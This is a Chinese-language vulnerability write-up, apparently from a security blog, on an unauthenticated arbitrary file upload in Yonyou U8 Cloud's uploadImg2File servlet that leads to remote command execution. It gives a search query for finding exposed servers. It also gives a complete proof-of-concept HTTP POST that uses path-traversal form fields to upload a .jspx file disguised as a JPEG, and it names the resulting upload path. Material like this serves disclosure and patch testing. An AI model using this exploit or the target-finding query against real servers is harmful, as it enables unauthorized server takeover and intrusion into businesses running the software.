登录 白背景

用友U8 Cloud uploadImg2File 任意文件上传漏洞

一、漏洞描述

用友U8 cloud前台任意文件上传导致远程命令执行漏洞。未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。

二、影响版本

  • 用友U8 Cloud

三、资产测绘

  • hunterapp.name="用友 U8 Cloud"

image.png

  • 登录页面

image.png

四、漏洞复现

POST /hrss/servlet/uploadImg2File HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 651
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;    boundary=----WebKitFormBoundary6veAfRuWsMCxTodB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=882076295B79AA8C024D8F4FC5DDFF97.server; JSESSIONID=C717FE1B698660C55A9897A4D6A41177.server
Connection: close

------WebKitFormBoundary6veAfRuWsMCxTodB
Content-Disposition: form-data; name="x"

../
------WebKitFormBoundary6veAfRuWsMCxTodB
Content-Disposition: form-data; name="y"

../
------WebKitFormBoundary6veAfRuWsMCxTodB
Content-Disposition: form-data; name="w"

../
------WebKitFormBoundary6veAfRuWsMCxTodB
Content-Disposition: form-data; name="h"

../
------WebKitFormBoundary6veAfRuWsMCxTodB
Content-Disposition: form-data; name="txtFileName"; filename="stc.jspx"
Content-Type: image/jpeg

123
------WebKitFormBoundary6veAfRuWsMCxTodB--

image.png
上传文件位置

/hrss/uploads/202311091242211699461741771.jspx

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/zksc32uu5wgqwrre